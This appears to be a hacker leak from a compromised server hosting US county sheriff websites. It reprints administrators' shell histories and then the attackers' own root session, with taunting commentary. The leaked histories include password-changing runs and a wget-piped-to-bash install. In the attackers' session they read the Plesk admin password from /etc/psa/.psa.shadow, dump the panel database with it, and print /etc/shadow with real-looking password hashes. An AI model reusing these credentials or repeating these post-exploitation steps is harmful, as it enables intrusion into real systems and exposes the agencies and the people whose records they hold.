  2482. /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
  2483. ll
  2484. /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
  2485. crontab -e
  2486. postqueue -p
  2487. postqueue -p
  2488. postqueue -f
  2489. ll
  2490. ll
  2491. less huh
  2492. ll -rt
  2493. ll -h
  2494. ll -rth
  2495. top
  2496. ll
  2497. less tat\ E
  2498. postqueue -p
  2499. postqueue -p
  2500. postqueue -p
  2501. postqueue -f
  2502. postqueue -f
  2503. postqueue -p
  2504. postqueue -p
  2505. postqueue -p
  2506. postqueue -p
  2507. postqueue -f
  2508. postqueue -p
  2509. postqueue -f
  2510. postqueue -p
  2511. postqueue -f
  2512. postqueue -p
  2513. postqueue -f
  2514. postqueue -p
  2515. postqueue -f
  2516. postqueue -p
  2517. postqueue -p
  2518. postqueue -p
  2519. postqueue -p
  2520. postqueue -p
  2521. postqueue -p
  2522. postqueue -p
  2523. postqueue -p
  2524. postqueue -p
  2525. postqueue -f
  2526. postqueue -p
  2527. top
  2528. postqueue -p
  2529. postqueue -p
  2530. postqueue -p
  2531. postqueue -p
  2532. postqueue -p
  2533. ls
  2534. cd bin
  2535. ls
  2536. cd ../scripts/
  2537. ls
  2538. rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
  2539. rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
  2540. ./backup-now.sh
  2541. cd
  2542. ls
  2543. rm BACKUP092010.csv.gz
  2544. less recaptcha.log
  2545. less recaptchalib.php
  2546. for i in $(cat recaptcha.log); do echo $i; done
  2547. for i in $(cat recaptcha.log); do ls -al $i; done
  2548. for i in $(cat recaptcha.log); do ls -al $i; done > perms.log
  2549. for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done
  2550. for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done| wc -l
  2551. wc -l perms.log
  2552. for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $il cat
  2553. recaptchalib.php > $i; done
  2554. for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; cat
  2555. recaptchalib.php > $i; done
  2556. ll /var/www/vhosts/georgecountymssheriff.com/httpdocs/recaptchalib.php
  2557. less /var/www/vhosts/randolphcountysheriff.org/httpdocs/recaptchalib.php
  2558. cd /var/www/vhosts/crosscountysheriff.org/home
  2559. ll
  2560. cd Cross\ County/
  2561. ll
  2562. less parse_pcv.php
  2563. ll
  2564. vi test.txt
  2565. ll
  2566. less parse_pcv.php
  2567. ll
  2568. crontab -l
  2569. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2570. County/parse_pcv.php
  2571. top
  2572. vi test.txt
  2573. vi test.txt
  2574. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2575. County/parse_pcv.php
  2576. cd images/
  2577. ll
  2578. cp *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
  2579. cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
  2580. \cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
  2581. cd ..
  2582. ll
  2583. ll
  2584. vi test.txt
  2585. ll
  2586. cd .
  2587. cd ..
  2588. ll
  2589. less pop_update.txt
  2590. cd /var/www/vhosts/stfranciscountysheriff.org/
  2591. ll
  2592. cd home/
  2593. ll
  2594. less check_population.php
  2595. cd /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/
  2596. pwd
  2597. ll
  2598. ll
  2599. ll
  2600. ll
  2601. top
  2602. ll
  2603. ll
  2604. cd ..
  2605. l
  2606. ll
  2607. cd Cross\ County/
  2608. ll
  2609. less Jun
  2610. ll
  2611. ll
  2612. ll
  2613. cd ..
  2614. ll
  2615. vi check_population.php
  2616. php check_population.php
  2617. vi check_population.php
  2618. php check_population.php
  2619. cd Cross\ County/
  2620. ll
  2621. less Population.txt
  2622. cd..
  2623.  
  2624. cd ..
  2625. php check_population.php
  2626. php check_population.php > Cross\ County/test.txt
  2627. crontab -l
  2628. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2629. County/parse_pcv.php
  2630. cd Cross\ County/
  2631. ll
  2632. vi test.txt
  2633. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2634. County/parse_pcv.php
  2635. vi inmate_class.php
  2636. vi inmate_class.php
  2637. top
  2638. top
  2639. postqueue -p
  2640. postqueue -p
  2641. postqueue -p
  2642. postqueue -p
  2643. postqueue -p
  2644. postqueue -p
  2645. postqueue -p
  2646. postqueue -p
  2647. top
  2648. postqueue -p
  2649. top
  2650. cd /var/www/vhosts/johnsoncosheriff.com/home
  2651. cd /var/www/vhosts/jocomosheriff.org/home/
  2652. ll
  2653. cd export_backup/
  2654. ll
  2655. ll -rt
  2656. cd ..
  2657. ll
  2658. cd Export/
  2659. ll
  2660. cd Images/
  2661. ll
  2662. ll -rt
  2663. cd ..
  2664. cd ..
  2665. ll
  2666. cd export_backup/
  2667. ll
  2668. cd ..
  2669. ll
  2670. less parse_roster.php
  2671. ll
  2672. cd export_backup/
  2673. ll
  2674. top
  2675. crontab -l
  2676. less
  2677. /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
  2678. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2679. /usr/bin/php
  2680. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2681. -u http://crosscountysheriff.org/ -r -n
  2682. http://crosscountysheriff.org/warrants.php?find=all
  2683. crontab -e
  2684. crontab -l
  2685. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2686. /usr/bin/php
  2687. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2688. -u http://crosscountysheriff.org/ -r -n
  2689. http://www.crosscountysheriff.org/warrants/view/all
  2690. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2691. /usr/bin/php
  2692. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2693. -u http://crosscountysheriff.org/ -r -n
  2694. http://www.crosscountysheriff.org/warrants/view/all \n cd
  2695. http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
  2696. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2697. /usr/bin/php
  2698. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2699. -u http://crosscountysheriff.org/ -r -n
  2700. http://www.crosscountysheriff.org/warrants/view/all \n
  2701. http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
  2702. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2703. /usr/bin/php
  2704. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2705. -u http://crosscountysheriff.org/ -r -n
  2706. http://www.crosscountysheriff.org/warrants/view/all \n
  2707. http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
  2708. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2709. /usr/bin/php
  2710. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2711. -u http://crosscountysheriff.org/ -r -n
  2712. http://www.crosscountysheriff.org/warrants/view/all \n
  2713. http://www.crosscountysheriff.org/index.php?a=warrantsv=viewid=all
  2714. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2715. /usr/bin/php
  2716. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2717. -u http://crosscountysheriff.org/ -r -n
  2718. http://www.crosscountysheriff.org/warrants/view/all \n
  2719. http://www.crosscountysheriff.org/index.php
  2720. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2721. /usr/bin/php
  2722. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2723. -u http://crosscountysheriff.org/ -r
  2724. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2725. /usr/bin/php
  2726. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2727. -u http://crosscountysheriff.org/ -r -n
  2728. http://www.crosscountysheriff.org/warrants/view/all\nhttp://www.
  2729. crosscountysheriff.org/index.php
  2730. top
  2731. lsof -p 20452
  2732. kill 20452
  2733. lsof -p 20452
  2734. top
  2735. lsof -p 32631
  2736. kill 32631
  2737. lsof -p
  2738. lsof -p 32631
  2739. top
  2740. lsof -p 5852
  2741. top
  2742. su - mstapleton
  2743. ll
  2744. cd /var/www/vhosts/kansassheriffs.org/uploads/
  2745. cd /var/www/vhosts/kansassheriffs.org/
  2746. ll
  2747. cd /httpdocs/
  2748. cd /va
  2749. cd /var/www/vhosts/kansassheriffs.org/httpdocs/
  2750. ll
  2751. cd /uploads/
  2752. cd uploads/
  2753. ll
  2754. cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/uploads/
  2755. ll
  2756. ../
  2757. ll
  2758. cd ../
  2759. ll
  2760. chown -R root:root uploads/
  2761. ll
  2762. cd uploads/
  2763. ll
  2764. cd ../
  2765. ll
  2766. chown -R kssa2 uploads/
  2767. ll
  2768. chown -R kssa2:kssa2 uploads/
  2769. ll
  2770. logout
  2771. cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
  2772. ll
  2773. cd ../
  2774. ll
  2775. cd httpdocs/
  2776. ll
  2777. rm -R httpdocs/
  2778. cd ../
  2779. ll
  2780. rm -R httpdocs/
  2781. y
  2782. y
  2783. y
  2784. y
  2785. y
  2786. y
  2787. y
  2788. y
  2789. ll
  2790. cd httpdocs/
  2791. ll
  2792. cd /var/www/vhosts/kansassheriffs.org/httpdocs/
  2793. ll
  2794. crontab -e
  2795. logout
  2796. cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
  2797. ll
  2798. cd ../
  2799. ll
  2800. rm -f httpdocs/
  2801. rm -R httpdocs/
  2802. ll
  2803. cd httpdocs/
  2804. ll
  2805. ../
  2806. cd ../
  2807. ll
  2808. rm -r httpdocs/
  2809. y
  2810. y
  2811. y
  2812. y
  2813. y
  2814. y
  2815. y
  2816. y
  2817. ll
  2818. rm -R httpdocs/
  2819. y
  2820. ll
  2821. logout
  2822. crontab -l
  2823. cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
  2824. /usr/bin/php
  2825. /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
  2826. -u http://crosscountysheriff.org/ -r -n
  2827. http://www.crosscountysheriff.org/warrants/view/all
  2828. cd /var/www/vhosts/howardcountysheriffar.com/
  2829. ll
  2830. cd httpdocs/
  2831. ll
  2832. ll
  2833. cd ..
  2834. cd home/
  2835. ll
  2836. touch test.txt
  2837. vi test.txt
  2838. ll
  2839. vi test.txt
  2840. ll
  2841. crontab -l
  2842. /usr/bin/php /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php
  2843. >/dev/null 2>&1
  2844. ll
  2845. yum info php
  2846. w
  2847. top
  2848. ps -ef | grep httpd
  2849. w
  2850. w
  2851. w
  2852. top
  2853. top
  2854. ps -ef
  2855. ps -ef
  2856. w
  2857. iostat
  2858. top
  2859. ps -ef | grep bp
  2860. kill 6144
  2861. top
  2862. crontab -l
  2863. ps -ef | grep imap
  2864. cd /etc/
  2865. w
  2866. top
  2867. ps -ef | grep php
  2868. ls /etc/init.d
  2869. chkconfig --list
  2870. runlevel
  2871. /etc/init.d/postfix restart
  2872. bg
  2873. ps -ef | grep bp
  2874. date
  2875. kill 31287
  2876. top
  2877. ps -ef
  2878. /etc/init.d/postfix start
  2879. ps -ef| grep imap
  2880. ps -ef| grep post
  2881. less /usr/local/psa/var/log/maillog
  2882. less /usr/local/psa/var/log/maillog
  2883. mailq
  2884. man bpbark
  2885. top
  2886. ps -ef | grep my
  2887. ps -ef | grep mysql
  2888. ps -ef | less
  2889. top
  2890. ps -ef | grep php
  2891. cd
  2892. ls
  2893. cd bin/
  2894. ls
  2895. cd ../scripts/
  2896. ls
  2897. ./backup-now.sh
  2898. top
  2899. ps -ef
  2900. top
  2901. ps -ef | grep psa
  2902. ps -ef |grep sp
  2903. pkill spider
  2904. ps -ef |grep sp
  2905. kill 6624 6644 18573
  2906. ps -ef |grep sp
  2907. ps -ef |grep spider
  2908. kill 11673 11717 18605
  2909. ps -ef |grep spider
  2910. top
  2911. top
  2912. nn
  2913. cd /var/www/vhosts/
  2914. ls
  2915. cd jacksonsheriff.org/
  2916. find . -name tiny_mce
  2917. find . -name tinymce
  2918. ls admin
  2919. cd httpdocs/
  2920. ls
  2921. ls admin
  2922. find .
  2923. find .| less
  2924. cd ../../crosscountysheriff.org/
  2925. cd httpdocs/
  2926. ls
  2927. find . -name tiny\*
  2928. less ./admin/tinymce/jscripts/tiny_mce/tiny_mce.js
  2929. mv ./admin/config/functions/tiny_mce.php
  2930. ./admin/config/functions/tiny_mce.php_bak
  2931. mv ./admin/tinymce/jscripts/tiny_mce ./admin/tinymce/jscripts/tiny_mce_bak
  2932. cp ~/tiny_mce.php ./admin/config/functions/tiny_mce.php
  2933. cp -rv ~/tiny_mce ./admin/tinymce/jscripts/tiny_mce
  2934. cd ../..
  2935. find . -type d -name wp-admin
  2936. pwd
  2937. cd ../..
  2938. cd www/vhosts/
  2939. ls
  2940. cd crosscountysheriff.org/
  2941. ls
  2942. cd httpdocs/admin/
  2943. ls
  2944. ll
  2945. history
  2946. ls
  2947. ll tinymce/
  2948. ls
  2949. ll config/
  2950. ll config/functions/
  2951. cd config/functions/
  2952. ll
  2953. diff tiny_mce.php tiny_mce.php_bak
  2954. ls
  2955. mv tiny_mce.php tiny_mce.php_new
  2956. mv tiny_mce.php_bak tiny_mce.php
  2957. cd ../
  2958. ls
  2959. cd ..
  2960. ls
  2961. history
  2962. cd tinymce/jscripts/
  2963. ll
  2964. mv tiny_mce tiny_mce_new
  2965. mv tiny_mce_bak tiny_mce
  2966. top
  2967. lsof -p 9043
  2968. kill 9043
  2969. lsof -p 9043
  2970. cd /var/log
  2971. ls
  2972. less rsnapshot
  2973. less rsnapshot
  2974. cd /var/www/vhosts/crosscountysheriff.org/
  2975. cd statistics/
  2976. ls
  2977. less logs/access_log
  2978. cd /var/www/vhosts/baxtercountysheriff.com/
  2979. ls
  2980. cd httpdocs/
  2981. cd admin_dymin/
  2982. ls
  2983. find . -name ping.php
  2984. ll
  2985. cd /var/www/vhosts/stonecountymosheriff.com/
  2986. ll
  2987. cd httpdocs/
  2988. ll
  2989. cd ..
  2990. cd home/
  2991. ll
  2992. cd export_backup/
  2993. ll
  2994. crontab -l
  2995. crontab -e
  2996. crontab -l
  2997. cd /var/www/vhosts/stonecountymosheriff.com/
  2998. cd home/
  2999. ll
  3000. cd export_backup/
  3001. ll
  3002. top
  3003. cd /var/www/vhosts/jocomosheriff.org/
  3004. ll
  3005. cd home/
  3006. ll
  3007. cd Export/
  3008. ll
  3009. cd ../export_backup/
  3010. ll
  3011. cd ..
  3012. ll
  3013. vi parse_roster.php
  3014. crontab -l
  3015. vi /backup/johms_parse_log.txt
  3016. ll
  3017. less clean.php
  3018. ll
  3019. cd export_backup/
  3020. ll
  3021. rm -f RosterExport_2011_01* RosterExport_2011_02* RosterExport_2011_03*
  3022. RosterExport_2011_04* RosterExport_2011_05*
  3023. rm -f RosterExport_2011_01*
  3024. rm -f RosterExport_2011_02*
  3025. rm -f RosterExport_2011_03*
  3026. rm -f RosterExport_2011_04*
  3027. rm -f RosterExport_2011_05*
  3028. rm -f RosterExport_2011_05*
  3029. rm -f RosterExport_2011_05_0*
  3030. rm -f RosterExport_2011_05*
  3031. rm -f RosterExport_2011_06*
  3032. ll
  3033. ll
  3034. ll
  3035. ll
  3036. cd ..
  3037. ll
  3038. vi parse_roster.php
  3039. ll
  3040. ll
  3041. ll
  3042. cd Export/
  3043. ll
  3044. cd Images/
  3045. ll
  3046. *.txt
  3047. ll | less
  3048. ll
  3049. cd ..
  3050. ll
  3051. cd ..
  3052. ll
  3053. less parse_roster.php
  3054. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3055. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3056. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3057. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3058. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3059. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3060. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3061. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3062. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3063. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3064. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3065. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3066. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3067. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3068. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3069. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3070. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3071. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3072. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3073. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3074. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3075. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3076. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3077. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3078. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3079. less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
  3080. crontab -l
  3081. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
  3082. /backup/johms_parse_log.txt
  3083. cd Export/Images/
  3084. ll
  3085. ll 1243376
  3086. ll 1243376*
  3087. ll 1*
  3088. ll 124*
  3089. ll 12433*
  3090. cd ..
  3091. ll
  3092. cd ..
  3093. ll
  3094. less clean.php
  3095. vi clean.php
  3096. php clean.php
  3097. vi clean.php
  3098. php clean.php
  3099. ll
  3100. cd Export/Images/
  3101. ll
  3102. cd ..
  3103. cd ..
  3104. php clean.php
  3105. ll
  3106. php clean.php
  3107. ll
  3108. ll
  3109. ll
  3110. cd export_backup/
  3111. ll
  3112. less RosterExport_2011_07_
  3113. ll
  3114. ll
  3115. cd ..
  3116. ll
  3117. vi parse_roster.php
  3118. vi parse_roster.php
  3119. ll
  3120. cd export_backup/
  3121. ll
  3122. ll
  3123. ll
  3124. cd /backup/
  3125. ll
  3126. vi johms_parse_log.txt
  3127. ll
  3128. cd /var/www/vhosts/jocomosheriff.org/home/
  3129. ll
  3130. cd Export/
  3131. ll
  3132. ll
  3133. ll
  3134. ll
  3135. ll
  3136. ll
  3137. ll
  3138. ll
  3139. cd Images/
  3140. ll
  3141. cd ..
  3142. ll
  3143. cp *.JPG Images/
  3144. ll
  3145. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
  3146. /backup/johms_parse_log.txt
  3147. cd ..
  3148. cd export_backup/
  3149. ll
  3150. ll
  3151. ll
  3152. cd ..
  3153. cd Export/
  3154. ll
  3155. cd Images/
  3156. ll
  3157. ll
  3158. ll | less
  3159. ll
  3160. cd ..
  3161. ll
  3162. cd ..
  3163. ll
  3164. du -sh ./*
  3165. vi clean.php
  3166. php clean.php
  3167. ll
  3168. vi clean.php
  3169. php clean.php
  3170. ll
  3171. du -sh ./*
  3172. cd Export/
  3173. ll
  3174. cd ..
  3175. ll
  3176. crontab -l
  3177. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
  3178. /backup/johms_parse_log.txt
  3179. ll
  3180. du -sh ./*
  3181. ll
  3182. cd export_backup/
  3183. ll
  3184. ll
  3185. cd ..
  3186. cd Export/Images/
  3187. ll
  3188. cd ../../
  3189. ll
  3190. php clean.php
  3191. ll
  3192. du -sh ./*
  3193. ll
  3194. ll
  3195. du -sh ./*
  3196. du -sh ./*
  3197. du -sh ./*
  3198. cd Export/
  3199. ll
  3200. cd Images/
  3201. ll
  3202. ll
  3203. ll 1322055.JPG
  3204. ll
  3205. cd ../../
  3206. ll
  3207. php parse_roster.php
  3208. ll
  3209. cd Export/
  3210. ll
  3211. ll
  3212. cd Images/
  3213. ll
  3214. cd ..
  3215. ll
  3216. ll
  3217. du -sh
  3218. du -sh ./*
  3219. top
  3220. ll
  3221. cd ..
  3222. du -sh ./*
  3223. ll
  3224. ll
  3225. du -sh ./*
  3226. du -sh ./*
  3227. cd ~
  3228. ll
  3229. mkdir MASS_PASS
  3230. ll
  3231. cd MASS_PASS/
  3232. ll
  3233. vi masspass.php
  3234. ll
  3235. php masspass.php
  3236. vi masspass.php
  3237. php masspass.php
  3238. vi masspass.php
  3239. php masspass.php
  3240. vi masspass.php
  3241. vi masspass.php
  3242. php masspass.php
  3243. vi masspass.php
  3244. php masspass.php
  3245. vi masspass.php
  3246. php masspass.php
  3247. vi masspass.php
  3248. php masspass.php -p 12345
  3249. php masspass.php -p12345
  3250. vi masspass.php
  3251. php masspass.php -p12345
  3252. php masspass.php
  3253. vi masspass.php
  3254. php masspass.php
  3255. php masspass.php -oe0d14a92 -n12345
  3256. vi masspass.php
  3257. php masspass.php -oe0d14a92 -n12345
  3258. php masspass.php -oe0d14a92 -nY9BNtSeb
  3259. vi masspass.php
  3260. php masspass.php -oe0d14a92 -nY9BNtSeb
  3261. php masspass.php
  3262. vi masspass.php
  3263. php masspass.php
  3264. php masspass.php -n705ad48f3563c4c30d3fec8564b7636b
  3265. -oa872c8327d9b4b3e3e1cf6b673c529b4
  3266. php masspass.php
  3267. ll
  3268. php masspass.php
  3269. vi masspass.php
  3270. crontab -e
  3271. top
  3272. ll
  3273. less sete.sh
  3274. less tat\ E
  3275. cd /var/www/vhosts/crosscountysheriff.org/home/
  3276. ll
  3277. cd Cross\ County/
  3278. ll
  3279. vi test.txt
  3280. ll
  3281. crontab -l
  3282. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  3283. County/parse_pcv.php >/dev/null 2>&1
  3284. cd /var/www/vhosts/boonesheriff.com/home/
  3285. ll
  3286. vi test.txt
  3287. ll
  3288. cronatb -l
  3289. crontab -l
  3290. /usr/bin/php /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
  3291. ll
  3292. cd images/
  3293. ll
  3294. ll
  3295. cd ..
  3296. ll
  3297. ls
  3298. ls scripts/
  3299. at 6:00 AM tomorrow
  3300. postfix -q
  3301. postfix -p
  3302. postqueue -q
  3303. postqueue -p
  3304. cd /usr/local/ll
  3305. cd /usr/local/psa/var/
  3306. ll
  3307. cd log
  3308. ll
  3309. less maillog
  3310. grep 'status=' maillog | less
  3311. grep 'status=deferred' maillog | less
  3312. grep 'timed out while receiving the initial server greeting' maillog | less
  3313. grep 'conversation with s2smtpout' maillog | less
  3314. grep 'radams' maillog | less
  3315. crontab -l
  3316. grep 'conversation with s2smtpout' maillog | mail -s "Relay Server Issues"
  3317. grep '[email protected]' maillog | less
  3318. cd ~
  3319. ll
  3320. ll
  3321. less huh
  3322. ll
  3323. ll -rt
  3324. cd MASS_PASS/
  3325. ll
  3326. php masspass.php
  3327. php masspass.php -oY9BNtSeb -nYNw1rTxp
  3328. php masspass.php
  3329. php masspass.php -n10df020e5e24b80589b4b618b107055c
  3330. -o705ad48f3563c4c30d3fec8564b7636b
  3331. php masspass.php
  3332. cd MASS_PASS/
  3333. ll
  3334. php masspass.php
  3335. ll
  3336. cd MASS_PASS/
  3337. php masspass.php
  3338. su - mstapleton
  3339. cd /var/www/vhosts/
  3340. ll
  3341. cd cherokeecountyalsheriff.com/
  3342. ll
  3343. cd httpdocs/
  3344. ll
  3345. cd _newsite/
  3346. ll
  3347. cd ../
  3348. ll
  3349. chown -R ccsal:psacln _newsite/
  3350. ll
  3351. cd _newsite/
  3352. ll
  3353. exit
  3354. cd /var/www/vhosts/cherokeecountyalsheriff.com/
  3355. ll
  3356. cd httpdocs/
  3357. ll
  3358. cd _n
  3359. cd _newsite/
  3360. ll
  3361. cd controllers/
  3362. ll
  3363. cd ../
  3364. ll
  3365. chown -R ccsal:psacln controllers/
  3366. chown -R ccsal:psacln helpers/
  3367. chown -R ccsal:psacln model/
  3368. chown -R ccsal:psacln views/
  3369. ll
  3370. exit
  3371.  
  3372.  
  3373. # cat ~webdebt/.bash_history
  3374.  
  3375.  
  3376. su -l root -c "wget -q -O - http://208.109.96.14/public/scripts/nbu_install.sh |
  3377. bash -s 800384d4-e9bb-11de-a2ed-00114332b4ff"
  3378. exit
  3379. su root
  3380. su
  3381. ls
  3382. cd var/
  3383. ls
  3384. cd www/vhosts/
  3385. ls
  3386. cd baxtercountysheriff.com/
  3387. ls
  3388. cd httpdocs
  3389. ls
  3390. mkdir httpdocs
  3391. su -
  3392. su -
  3393. ls
  3394. cd /var/www/vhosts/
  3395. ls
  3396. cd baxtercountysheriff.com/
  3397. ls
  3398. mkdir vhosts
  3399. cd ..
  3400. ls
  3401. mkdir poop
  3402. rm poop
  3403. rm -rf poop
  3404. ls
  3405. cd 20jdpa
  3406. cd 20jdpa.com/
  3407. ls
  3408. mkdir httpdocs
  3409. ls
  3410. mkdir httpdocs
  3411. su
  3412. cd /var/www/vhosts/
  3413. ll
  3414. cd 20jdpa.com/httpdocs/
  3415. su
  3416. su -
  3417. mkdir cert
  3418. exit
  3419. su -
  3420. su -
  3421. exti
  3422. exit
  3423. su -
  3424. su -
  3425. su -
  3426. su -
  3427. exi
  3428. exit
  3429. ll
  3430. cd ..
  3431. cd
  3432. ll
  3433. cd
  3434. /
  3435. cd //
  3436. ll
  3437. su -
  3438. exit
  3439. su
  3440. cd.
  3441. ;;
  3442. ll
  3443. su root
  3444. ll
  3445. cd
  3446. ll
  3447. cd
  3448. ll
  3449. su
  3450. su -
  3451. cd .ssh
  3452. lll
  3453. ll
  3454. ll -a
  3455. less authorized_keys
  3456. cd ~
  3457. pwd
  3458. exit
  3459.  
  3460. ////////////////////////////////////////////////////////////////////////////////
  3461. ON TO SERVER NUMBER TWO...
  3462. ROOTING YOUR BOX ALL OVER AGAIN ... THANKS FOR COPYING OUR ROOTSHELLS OVER!
  3463. ////////////////////////////////////////////////////////////////////////////////
  3464.  
  3465. # id
  3466. uid=0(root) gid=0(root) groups=48(apache),504(psaserv),506(psasb)
  3467.  
  3468. # uname -a
  3469. Linux ip-173-201-44-217.ip.secureserver.net 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9
  3470. 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
  3471.  
  3472. // GET THEIR NEW PLESK ROOT PASSWORD...
  3473.  
  3474. # cat /etc/psa/.psa.shadow
  3475. xP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/
  3476.  
  3477. // GET THEIR NEW PASSWORDS... THANKS AGAIN PLESK FOR THE PLAINTEXTS
  3478.  
  3479. # mysqldump -q -u admin -pxP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/ --databases psa
  3480. --add-drop-table > newpasses.sql
  3481.  
  3482. // JUST FOR FUN...
  3483.  
  3484. # cat /etc/shadow
  3485. root:$1$.1QVTig3$JduJkOj4jwaps0mslfpGK0:15184:0:99999:7:::
  3486. bin:*:13913:0:99999:7:::
  3487. daemon:*:13913:0:99999:7:::
  3488. adm:*:13913:0:99999:7:::
  3489. lp:*:13913:0:99999:7:::
  3490. sync:*:13913:0:99999:7:::
  3491. shutdown:*:13913:0:99999:7:::
  3492. halt:*:13913:0:99999:7:::
  3493. mail:*:13913:0:99999:7:::
  3494. news:*:13913:0:99999:7:::
  3495. uucp:*:13913:0:99999:7:::
  3496. operator:*:13913:0:99999:7:::
  3497. games:*:13913:0:99999:7:::
  3498. gopher:*:13913:0:99999:7:::
  3499. ftp:*:13913:0:99999:7:::
  3500. nobody:*:13913:0:99999:7:::
  3501. rpm:!!:13913:0:99999:7:::
  3502. dbus:!!:13913:0:99999:7:::
  3503. mailnull:!!:13913:0:99999:7:::
  3504. smmsp:!!:13913:0:99999:7:::
  3505. nscd:!!:13913:0:99999:7:::
  3506. vcsa:!!:13913:0:99999:7:::
  3507. rpc:!!:13913:0:99999:7:::
  3508. rpcuser:!!:13913:0:99999:7:::
  3509. nfsnobody:!!:13913:0:99999:7:::
  3510. sshd:!!:13913:0:99999:7:::
  3511. pcap:!!:13913:0:99999:7:::
  3512. haldaemon:!!:13913:0:99999:7:::
  3513. bjmsuper:$1$M63jQMA6$cv.SNTL28NcjmVAaxs2Ej.:15184:0:99999:7:::
  3514. avahi:!!:15182::::::
  3515. avahi-autoipd:!!:15182::::::
  3516. named:!!:15182::::::
  3517. xfs:!!:15182::::::
  3518. apache:!!:15182::::::
  3519. distcache:!!:15182::::::
  3520. mysql:!!:15182::::::
  3521. ntp:!!:15182::::::
  3522. psaadm:!!:15182:0:99999:7:::
  3523. popuser:!!:15182:0:99999:7:::
